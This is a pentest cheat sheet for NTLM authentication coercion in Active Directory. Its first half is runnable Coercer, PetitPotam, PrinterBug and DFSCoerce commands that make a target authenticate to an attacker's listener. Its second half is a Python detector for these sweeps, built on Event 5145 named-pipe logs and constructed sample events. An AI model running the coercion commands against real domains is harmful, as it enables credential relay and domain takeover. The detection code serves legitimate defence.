NTLM Coercion

Coerce NTLM authentication from hosts using any Active Directory account

Define Shell Variables

TARGET='<TARGET IP/FQDN>'
LISTENER='<YOUR IP/FQDN>'
ADUSER='<AD USERNAME>'
ADDOMAIN='<AD DOMAIN>'

Coercer (Preferred)

pipx install git+https://github.com/p0dalirius/Coercer.git
source ~/.zshrc

# Scan for Coercion
coercer scan -t $TARGET -u $ADUSER -d $ADDOMAIN

# Coerce Brute Force (All Techniques)
coercer coerce -l $LISTENER -t $TARGET -u $ADUSER -d $ADDOMAIN --always-continue

# Coerce HTTP NTLM Auth (WebDAV)
coercer coerce -l $LISTENER -t $TARGET -u $ADUSER -d $ADDOMAIN --auth-type http

PetitPotam

cd tools
git clone https://github.com/topotam/PetitPotam.git
cd PetitPotam
chmod +x PetitPotam.py
python3 PetitPotam.py $LISTENER $TARGET -u $ADUSER -d $ADDOMAIN

PrinterBug

cd tools
git clone https://github.com/dirkjanm/krbrelayx
cd krbrelayx
python3 printerbug.py $ADDOMAIN/$ADUSER@$TARGET $LISTENER

DFSCoerce

cd tools
git clone https://github.com/Wh04m1001/DFSCoerce.git
cd DFSCoerce
python3 dfscoerce.py $LISTENER $TARGET -u $ADUSER -d $ADDOMAIN
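
Detection side of the tools above, as an added example that is not part of the original page or of any of these projects: each tool reaches its RPC interface through a named pipe on IPC$, which Windows logs as Event ID 5145 when Detailed File Share auditing is enabled. The event field names, the sample events and the "two or more distinct pipes within 60 seconds" threshold are assumptions made for this sketch.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Named pipes behind the RPC interfaces the tools on this page call.
COERCION_PIPES = {
    "efsrpc": "MS-EFSR (PetitPotam)",
    "lsarpc": "MS-EFSR over lsarpc (PetitPotam)",
    "spoolss": "MS-RPRN (PrinterBug)",
    "netdfs": "MS-DFSNM (DFSCoerce)",
}

def ev(time, ip, account, share, target):
    return {"event_id": 5145, "time": time, "source_ip": ip,
            "account": account, "share": share, "target": target}

# Constructed sample events (hypothetical field names, not a real export).
SAMPLE_EVENTS = [
    ev("2024-05-01T10:00:01", "10.0.0.50", "jdoe", r"\\*\IPC$", "spoolss"),
    ev("2024-05-01T10:00:03", "10.0.0.50", "jdoe", r"\\*\IPC$", "efsrpc"),
    ev("2024-05-01T10:00:05", "10.0.0.50", "jdoe", r"\\*\IPC$", "netdfs"),
    ev("2024-05-01T10:05:00", "10.0.0.20", "svc_backup", r"\\*\IPC$", "lsarpc"),
    ev("2024-05-01T10:05:30", "10.0.0.20", "svc_backup", r"\\*\IPC$", "lsarpc"),
    ev("2024-05-01T10:06:00", "10.0.0.30", "asmith", r"\\*\SYSVOL", "gpt.ini"),
    ev("2024-05-01T09:00:00", "10.0.0.40", "bwong", r"\\*\IPC$", "spoolss"),
    ev("2024-05-01T11:00:00", "10.0.0.40", "bwong", r"\\*\IPC$", "netdfs"),
]

def find_coercion_sweeps(events, window=timedelta(seconds=60), min_pipes=2):
    """Flag (source_ip, account) pairs that open at least min_pipes distinct
    coercion-related pipes over IPC$ within one sliding time window."""
    by_source = defaultdict(list)
    for e in events:
        pipe = e["target"].lower()
        if (e["event_id"] == 5145 and e["share"].upper().endswith("IPC$")
                and pipe in COERCION_PIPES):
            when = datetime.fromisoformat(e["time"])
            by_source[(e["source_ip"], e["account"])].append((when, pipe))
    alerts = []
    for (ip, account), hits in by_source.items():
        hits.sort()
        best, start = set(), 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1  # shrink window from the left
            pipes = {p for _, p in hits[start:end + 1]}
            best = max(best, pipes, key=len)
        if len(best) >= min_pipes:
            alerts.append((ip, account, sorted(best)))
    return alerts
```

Access to lsarpc on its own is routine domain traffic, which is why the sketch keys on several distinct pipes from one source rather than on any single pipe; tune the window and threshold against your own baseline.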
